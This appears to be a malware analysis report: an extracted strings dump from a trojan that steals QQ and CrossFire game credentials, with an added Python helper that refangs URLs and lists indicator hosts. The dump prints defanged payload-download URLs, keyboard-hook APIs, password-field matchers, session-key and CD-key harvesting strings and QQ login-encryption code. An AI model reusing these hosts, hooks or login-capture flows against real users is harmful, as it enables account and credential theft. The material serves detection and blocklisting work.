{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNN
.CNNNB
.CNNd
ÝDDDDDDQC
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
AVIFIL32.dll
MSVFW32.dll
oledlg.dll
RASAPI32.dll
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
2.6.0.0
VVV.cfzhushou.com
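The URLs and hostnames in this dump are defanged with the report's conventions (hXXp://, hXXps://, VVV.), and they fall into two groups: the hosts the sample fetches configuration and payloads from (cfzhushou.com, xinzyw.com, down.9udn.com, xzdownad.zglhsw.com, kubei9.com) and the many qq.com endpoints that appear in its login and game-activity requests. The Python below is an added triage helper, not part of the report: it reverses the defanging, pulls hostnames out of every string (including URLs buried inside query parameters) and separates them by domain. The FIRST_PARTY_DOMAINS list and the sample lines are constructed for the example; the sample lines are copied from the dump above, and the split is a starting point for blocklisting and pivoting, not a verdict on any host.

```python
import re
from urllib.parse import urlsplit

# Defanging conventions used throughout this report: "hXXp(s)://" for http(s)://
# and "VVV." for "www.".  Only a hostname-initial VVV is rewritten.
_DEFANG_RULES = [
    (re.compile(r"hXXp(s?)://", re.IGNORECASE), r"http\1://"),
    (re.compile(r"\bVVV\."), "www."),
]
_URL_RE = re.compile(r"https?://[^\s\"'<>()|]+")
_BARE_WWW_RE = re.compile(r"\bwww\.[a-z0-9.-]+\.[a-z]{2,}\b", re.IGNORECASE)

# ASSUMPTION (not from the report): the service the trojan logs in to and the
# public CDN it loads jQuery from.  Everything else is treated as candidate
# attacker/affiliate infrastructure and listed for blocking or pivoting.
FIRST_PARTY_DOMAINS = ("qq.com", "googleapis.com")


def refang(line: str) -> str:
    """Turn a defanged string back into a real URL or hostname."""
    for pattern, replacement in _DEFANG_RULES:
        line = pattern.sub(replacement, line)
    return line


def hosts_in(line: str) -> set:
    """Lower-cased hostnames from full URLs (also ones embedded in query
    strings) and from bare www. names; packed-data noise yields nothing."""
    line = refang(line)
    hosts = set()
    for url in _URL_RE.findall(line):
        host = urlsplit(url).hostname
        if host:
            hosts.add(host.lower())
    for host in _BARE_WWW_RE.findall(line):
        hosts.add(host.lower())
    return hosts


def is_first_party(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in FIRST_PARTY_DOMAINS)


def triage(lines) -> dict:
    """Split every host seen in the strings into first-party vs. other."""
    seen = set()
    for line in lines:
        seen |= hosts_in(line)
    return {
        "first_party": sorted(h for h in seen if is_first_party(h)),
        "other": sorted(h for h in seen if not is_first_party(h)),
    }


# Constructed sample: lines copied from the dump above, plus one line of
# packed-data noise to show it is ignored.
SAMPLE_STRINGS = [
    "hXXp://xinzyw.com/cf.txt",
    "hXXp://cfzhushou.com/cf.txt",
    "hXXp://VVV.cfzhushou.com",
    "hXXp://down.9udn.com/aload/as/33.txt",
    "hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll",
    "hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=",
    "&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052",
    "hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js",
    "VVV.kubei9.com",
    "OB FE9KR?WC [I7WT<eL.bM:iP/dQ>qN?EJIKOPMTDMRSWIE",
]

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_STRINGS).items():
        print(bucket, hosts)
```

Run it over the whole strings section rather than the sample and the "other" bucket is the candidate IOC list; the "first_party" bucket still matters for detection, because a workstation process other than a browser or the game client talking to ptlogin2.qq.com and bbs.cf.qq.com is the behavioural signature of this family.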

%original file name%.exe_3308_rwx_00401000_004DC000:

t$(SSh
~%UVW
u$SShe
wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
ntdll.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ShellExecuteA
GetProcessHeap
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
[VVV.111Ttt.com]
-URL:
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
MsgBox
SysShadow.SubWnd
\exdui.dll
.rsrc
\dwmapi.dll
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
CDKEY
CDKEY:
02/24/16
V2.6.0
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>
01/04/17
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i += 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
return core_md5(opad.concat(hash), 512 + 128)
for (var i = 0; i < str.length * chrsz; i += chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i += chrsz) {
str += String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i++) {
str += hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 + 4)) & 15) + hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i += 3) {
if (i * 8 + j * 6 > binarray.length * 32) {
str += tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i + 2) {
arr.push('\\x' + str.substr(i, 2))
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000' + vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len + rsaH1 + TEA.strToBytes(salt) + vcodeLen + hexVcode);
TEA.initkey('');
return saltPwd.replace(/[\/\+=]/g,
'/': '-',
'+': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str2 = str1 + vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
while (z + aD < aC.length) {
t += aC.substring(z, z + aD) + '\n';
return t + aC.substring(z, aC.length)
return '0' + t.toString(16)
return t.toString(16)
if (aG < aD.length + 11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength() + 7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aE + aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t++] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-' + this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG += this.DB - aC)
aG += this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1) + l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC++] = aE & this.DM;
aE >>= this.DB
aD[aC++] = aE & this.DM;
aE >>= this.DB
aD[aC++] = this.DV + aE
var t = this.abs(),
aE = z.abs();
aD[aC + t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z + t.t] += t.am(z + 1, 2 * t[z], aC, 2 * z + 1, aD, t.t - z - 1)) >= t.DV) {
aC[z + t.t] -= t.DV;
aC[aC.t - 1] += t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT + (aG[aO - 1] + aR) * aS);
if ((aG[aO] += aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl + (((z * this.mph + (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z] += this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {
var H = window.crypto.random(32);
for (K = 0; K < H.length; ++K) {
W[ae++] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length; ++ae) {
return o.next()
for (t = 0; t < z.length; ++t) {
af.prototype.nextBytes = ax;
z = (z + this.S[aD] + aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B++) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A += 2) {
C += String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A++) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C++) {
var A = u.length;
for (var B = 0; B < E.length; B++) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B += 2) {
C[A++] = parseInt(E.substr(B, 2), 16)
s.TEA = {
for (var B = 0; B < C.length; B++) {
A += String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18) + G.charAt((H >> 12) & 63) + B + B);
A.push(G.charAt(H >> 18) + G.charAt((H >> 12) & 63) + G.charAt((H >> 6) & 63) + B);
return A.join('')
if (!window.btoa) {
window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x' + hex.substr(j, 2))
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000' + c.length.toString(16);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len + rsaH1 + s.TEA.strToBytes(salt) + vcodeLen + hexVcode);
s.TEA.initkey('');
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
